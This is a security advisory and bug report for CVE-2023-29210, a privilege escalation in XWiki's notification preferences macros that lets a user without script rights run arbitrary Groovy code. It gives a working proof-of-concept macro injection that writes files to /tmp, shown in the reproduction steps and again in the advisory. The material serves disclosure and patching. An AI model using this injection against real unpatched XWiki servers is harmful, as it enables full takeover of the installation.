Headline
CVE-2023-29210: Privilege escalation (PR) from account/view through Notification Preferences Macros
XWiki Commons are technical libraries common to several other top level XWiki projects. Any user with view rights on commonly accessible documents including the notification preferences macros can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the user parameter of the macro that provide the notification filters. These macros are used in the user profiles and thus installed by default in XWiki. The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10.
**Type: ** Bug
Resolution: Fixed
**Priority: ** Blocker
- Affects Version/s: 13.2-rc-1
Documentation in Release Notes:
N/A
Steps to reproduce:
Add
{{notificationsFiltersPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit.txt~").withWriter { out -> out.println(~"created from filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}
{{notificationsAutoWatchPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit2.txt~").withWriter { out -> out.println(~"created from auto watch preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}
{{notificationsEmailPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit3.txt~").withWriter { out -> out.println(~"created from email filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}
to any place where you can use wiki syntax like the “about” section in your user profile as a user without programming or script rights.
Expected result:
No file is created.
Actual result:
A file /tmp/exploit.txt is created with content "created from filter preferences!". Similar files are created for the other macros. This shows privilege escalation to programming rights. The attack can be executed with just an account that permits write access to the user profile or also with just view rights via CKEditor’s HTML converter.
is caused by
XWIKI-16158 Allow admin to access the notification preferences of other users
- Closed
Related news
### Impact Any user with view rights on commonly accessible documents including the notification preferences macros can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the user parameter of the macro that provide the [notification filters](https://extensions.xwiki.org/xwiki/bin/view/Extension/Notifications%20Application/#HFilters). These macros are used in the user profiles and thus installed by default in XWiki. A proof of concept exploit is ``` {{notificationsFiltersPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit.txt~").withWriter { out -> out.println(~"created from filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}} {{notificationsAutoWatchPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit...